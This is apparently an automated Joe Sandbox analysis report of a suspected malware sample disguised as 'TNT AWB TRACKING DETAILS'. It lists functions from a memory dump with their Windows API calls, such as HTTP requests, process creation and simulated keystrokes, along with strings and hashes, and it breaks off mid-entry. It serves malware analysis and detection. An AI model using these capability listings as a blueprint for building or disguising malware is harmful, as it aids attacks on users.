CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00B32C0C), ref: 00B18B6F
CoGetObject.OLE32(?,00000000,00B32C0C,?), ref: 00B18B92
SetErrorMode.KERNEL32(00000000), ref: 00B18BA5
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00B18C25
VariantClear.OLEAUT32(?), ref: 00B18C35

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 585167c88bb830d315e61934c42e053ffaf40b0c1ecbd8aefd5c3e55835130ce
Instruction ID: 63e199a6b77e9b16e80f746194a29ce4f029952cf4119dafd2e87f7419801452
Opcode Fuzzy Hash: 585167c88bb830d315e61934c42e053ffaf40b0c1ecbd8aefd5c3e55835130ce
Instruction Fuzzy Hash: BDC147B1208305AFC700DF68C88496BB7E9FF89348F4049ADF9899B251DB71ED46CB52

Function 00B07990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00B07A6C

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: f27a158c14e486418c6b7ee959b0ad7a656b57e9d896f55b09c6ab50001371ef
Instruction ID: 57fb762d5d8aa5047c27fc2bf2d70acd61bdc4e70968ac2a0bb512c0b6bac6ed
Opcode Fuzzy Hash: f27a158c14e486418c6b7ee959b0ad7a656b57e9d896f55b09c6ab50001371ef
Instruction Fuzzy Hash: 06B17D71D4420A9FEB10DFA4C884BBEBBF4FF09321F2444A9E551E7281DB74A941CBA0

Function 00AAFA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00AAFAA6
OleUninitialize.OLE32(?,00000000), ref: 00AAFB45
UnregisterHotKey.USER32(?), ref: 00AAFC9C
DestroyWindow.USER32(?), ref: 00AE45D6
FreeLibrary.KERNEL32(?), ref: 00AE463B
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00AE4668

Strings

close all, xrefs: 00AAFAA1

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 89590e577f6179e4817928cfdee2605aee9cc224bd5f6920c332063f5023c2f7
Instruction ID: cba737ac9d11e65d6bc0c2c3f9b34664e851f27683884426be118a66197842ad
Opcode Fuzzy Hash: 89590e577f6179e4817928cfdee2605aee9cc224bd5f6920c332063f5023c2f7
Instruction Fuzzy Hash: F7A15131701112CFCB29EF55C595E69F7B8BF0A710F5542ADE80AAB2A1DB30AD16CF50

Function 00AFA068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00AFA439), ref: 00AFA377

Strings

CLASSNN, xrefs: 00AFA119
TEXT, xrefs: 00AFA2AE
REGEXPCLASS, xrefs: 00AFA13C
INSTANCE, xrefs: 00AFA285
CLASS, xrefs: 00AFA0F6
NAME, xrefs: 00AFA1A9

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 73b268e8b5a2cf3afaadc2084ea165fcb63aa0efac21069769ae9298e78a4d24
Instruction ID: bf3bde4f9e8f06324a611bfdbffe34e38c9940217b3380775ac1d605fbf510a0
Opcode Fuzzy Hash: 73b268e8b5a2cf3afaadc2084ea165fcb63aa0efac21069769ae9298e78a4d24
Instruction Fuzzy Hash: D491C271A04609AACB08DFE0C581FFEFBB8BF14300F508119E95DA7291DF316999CBA1

Function 00AA2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00AA2EAE

Part of subcall function 00AA1DB3: GetClientRect.USER32(?,?), ref: 00AA1DDC
Part of subcall function 00AA1DB3: GetWindowRect.USER32(?,?), ref: 00AA1E1D
Part of subcall function 00AA1DB3: ScreenToClient.USER32(?,?), ref: 00AA1E45

GetDC.USER32 ref: 00ADCD32
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00ADCD45
SelectObject.GDI32(00000000,00000000), ref: 00ADCD53
SelectObject.GDI32(00000000,00000000), ref: 00ADCD68
ReleaseDC.USER32(?,00000000), ref: 00ADCD70
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00ADCDFB

Strings

U, xrefs: 00ADCCD0

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: db488f47ed9725317271185d39868e4cf5c1dd7bea57e6160ae0cafc82cb47eb
Instruction ID: 98b4eb3e922c7c07ab12f6290d9100b5f867cee9819709b5cb99f6df551bec89
Opcode Fuzzy Hash: db488f47ed9725317271185d39868e4cf5c1dd7bea57e6160ae0cafc82cb47eb
Instruction Fuzzy Hash: A7717F31500206DFCF318F64CC84AAA7BB6FF49324F54426AED965B2A6DB319C91DB60

Function 00B11A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B11A50
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00B11A7C
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00B11ABE
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00B11AD3
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B11AE0
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00B11B10
InternetCloseHandle.WININET(00000000), ref: 00B11B57

Part of subcall function 00B12483: GetLastError.KERNEL32(?,?,00B11817,00000000,00000000,00000001), ref: 00B12498
Part of subcall function 00B12483: SetEvent.KERNEL32(?,?,00B11817,00000000,00000000,00000001), ref: 00B124AD

Strings

, xrefs: 00B11B01

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: f5a746e3ca4fc15f9a0a852463d41c77da65af7d148b086bec2e63c5843c8e23
Instruction ID: 4ac5110b97a8ab3d7872d1ccf829f509b8db9e575b00ab7d411ab95f8e43e1ec
Opcode Fuzzy Hash: f5a746e3ca4fc15f9a0a852463d41c77da65af7d148b086bec2e63c5843c8e23
Instruction Fuzzy Hash: E84181B1501219BFEB118F54CC85FFB7BACEF08354F40456AFA059B151EB709E859BA0

Function 00B18C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00B2F910), ref: 00B18D28
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00B2F910), ref: 00B18D5C
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00B18ED6
SysFreeString.OLEAUT32(?), ref: 00B18F00

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 7feae0b5838d64892c1bd5f2b40cbed076800fe7d19b725b8b752ffc9393c841
Instruction ID: f3cfa395bcae12cca4b79cafe9a105c939a378cea6806b85d9cb99792d8f2df6
Opcode Fuzzy Hash: 7feae0b5838d64892c1bd5f2b40cbed076800fe7d19b725b8b752ffc9393c841
Instruction Fuzzy Hash: BFF11B71A00109EFDB14DF94C888EEEB7B9FF49314F508598F515AB251DB31AE86CB90

Function 00B1F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B1F6B5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B1F848
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B1F86C
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B1F8AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B1F8CE
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B1FA4A
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00B1FA7C
CloseHandle.KERNEL32(?), ref: 00B1FAAB
CloseHandle.KERNEL32(?), ref: 00B1FB22

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: e826af20839656715f6c86617a131c4054af8d12773cb76c77e3820bef5da6c1
Instruction ID: 985af027e64d94f001c107f6dcb7a5307ef3ebf4dba112bf3dbfd3c94b5908d5
Opcode Fuzzy Hash: e826af20839656715f6c86617a131c4054af8d12773cb76c77e3820bef5da6c1
Instruction Fuzzy Hash: 61E190316043019FC714EF24C991BABBBE5EF85354F5485ADF8999B2A2CB31EC81CB52

Function 00B04CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B0466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B03697,?), ref: 00B0468B

Part of subcall function 00B0466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B03697,?), ref: 00B046A4

Part of subcall function 00B04A31: GetFileAttributesW.KERNEL32(?,00B0370B), ref: 00B04A32

lstrcmpiW.KERNEL32(?,?), ref: 00B04D40
_wcscmp.LIBCMT ref: 00B04D5A
MoveFileW.KERNEL32(?,?), ref: 00B04D75

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: fa416f9aab21ef7bd76273967d86d5c14a3654810f3e4814d0d2da5693f7cc30
Instruction ID: 4b40217a01dd8962fb445afc59b340d087a0d6d12e5979d9fdbc0b065f021080
Opcode Fuzzy Hash: fa416f9aab21ef7bd76273967d86d5c14a3654810f3e4814d0d2da5693f7cc30
Instruction Fuzzy Hash: B25164B24083459BC725DBA0D981EDF77ECEF85350F40096EB289D3191EF35A588C766

Function 00B28645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00B286FF

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 6b65e392ccb97e36bf2df673b1e4a53640df76e67018c5e3e8eda8d5ab840b20
Instruction ID: be364650d92418ca655e8c26485f64807df6160b94feff303f65adb9846e43c8
Opcode Fuzzy Hash: 6b65e392ccb97e36bf2df673b1e4a53640df76e67018c5e3e8eda8d5ab840b20
Instruction Fuzzy Hash: F0519130502264BEDF319F28AC85FA97BE5EB06710F6041A5F958EB1E1CF75AD90CB41

Function 00AA2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00ADC2F7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00ADC319
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00ADC331
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00ADC34F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00ADC370
DestroyIcon.USER32(00000000), ref: 00ADC37F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00ADC39C
DestroyIcon.USER32(?), ref: 00ADC3AB

Part of subcall function 00B2A4AF: DeleteObject.GDI32(00000000), ref: 00B2A4E8

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 4cf617d18ae802a237726a37c7edbd29c9ef24bb9102fb8b97bab031e678f8e6
Instruction ID: f9f238aaaea1a21c12504b3c49e08a84283ba96c7cc6bf44519702735e206fa9
Opcode Fuzzy Hash: 4cf617d18ae802a237726a37c7edbd29c9ef24bb9102fb8b97bab031e678f8e6
Instruction Fuzzy Hash: 19515C70A00206AFDB24DF68CC45FAA7BB5EB59320F104529F912D76E0DBB0ED61DB60

Function 00AF966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AFA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AFA84C
Part of subcall function 00AFA82C: GetCurrentThreadId.KERNEL32 ref: 00AFA853
Part of subcall function 00AFA82C: AttachThreadInput.USER32(00000000,?,00AF9683,?,00000001), ref: 00AFA85A

MapVirtualKeyW.USER32(00000025,00000000), ref: 00AF968E
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00AF96AB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00AF96AE
MapVirtualKeyW.USER32(00000025,00000000), ref: 00AF96B7
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00AF96D5
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00AF96D8
MapVirtualKeyW.USER32(00000025,00000000), ref: 00AF96E1
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00AF96F8
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00AF96FB

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: bf1e272e44e44435af8bcec54bf6048a8db12b63269cbe416d2348a60650e6e9
Instruction ID: 7af58fc82dea75ff2742d50b053ca9a1f56325635e4ee0d1678aa2daa8504cc1
Opcode Fuzzy Hash: bf1e272e44e44435af8bcec54bf6048a8db12b63269cbe416d2348a60650e6e9
Instruction Fuzzy Hash: E511E1B1910219BEFA216F60DC89F7A7B2DEB4C791F500435F344AB0A0CEF25C11DAA4

Function 00AF8921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00AF853C,00000B00,?,?), ref: 00AF892A
HeapAlloc.KERNEL32(00000000,?,00AF853C,00000B00,?,?), ref: 00AF8931
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00AF853C,00000B00,?,?), ref: 00AF8946
GetCurrentProcess.KERNEL32(?,00000000,?,00AF853C,00000B00,?,?), ref: 00AF894E
DuplicateHandle.KERNEL32(00000000,?,00AF853C,00000B00,?,?), ref: 00AF8951
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00AF853C,00000B00,?,?), ref: 00AF8961
GetCurrentProcess.KERNEL32(00AF853C,00000000,?,00AF853C,00000B00,?,?), ref: 00AF8969
DuplicateHandle.KERNEL32(00000000,?,00AF853C,00000B00,?,?), ref: 00AF896C
CreateThread.KERNEL32(00000000,00000000,00AF8992,00000000,00000000,00000000), ref: 00AF8986

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: db0e19f38d3a072bada63dda6b19950478fdbacf480ff541c29ad34e5049e245
Instruction ID: 444f5fe02cd973771e6bdee4b4336aee5b84ada9e5348f4f1f4850d7665027d4
Opcode Fuzzy Hash: db0e19f38d3a072bada63dda6b19950478fdbacf480ff541c29ad34e5049e245
Instruction Fuzzy Hash: 4E01BF75640309FFE720ABA5DD4EF673B6CEB89711F404421FA05DB191CA749811CB20

Function 00B19B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 00B19BA4, 00B19EC8
Not an Object type, xrefs: 00B19B7B

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: bb56c2297c0712894eaa0e7b8351b15e3a102e0deec88a391a25bb90b889b041
Instruction ID: dffe8dc2bd3ff690884f72a369cb54b2de8248427032b0c6b0ac1eed8546074e
Opcode Fuzzy Hash: bb56c2297c0712894eaa0e7b8351b15e3a102e0deec88a391a25bb90b889b041
Instruction Fuzzy Hash: 59C1C371A0024A9FDF10DF98D894BEEB7F5FF48314F5484A9E905AB280E770AD85CB90

Function 00B19113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B19167
VariantInit.OLEAUT32(?), ref: 00B19238
VariantInit.OLEAUT32(?), ref: 00B19339
VariantClear.OLEAUT32(?), ref: 00B19343
VariantClear.OLEAUT32(?), ref: 00B193A0

Strings

Null Object assignment in FOR..IN loop, xrefs: 00B191C8, 00B192F6, 00B193AE
Incorrect Object type in FOR..IN loop, xrefs: 00B1931C

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 34535308ada0ccf45de12e5cef084e6b75f8b97b58b74ad1678c0552d280491f
Instruction ID: dd77747d8b0a0bcf45f0aa7d5548a042fe344ddf805a0805eed82fbf4365571e
Opcode Fuzzy Hash: 34535308ada0ccf45de12e5cef084e6b75f8b97b58b74ad1678c0552d280491f
Instruction Fuzzy Hash: 6691B031A00245EBDF24CFA5D898FEEB7F8EF45710F108199F515AB280D7709985CBA0

Function 00B1975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00AF710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF7044,80070057,?,?,?,00AF7455), ref: 00AF7127
Part of subcall function 00AF710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF7044,80070057,?,?), ref: 00AF7142
Part of subcall function 00AF710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF7044,80070057,?,?), ref: 00AF7150
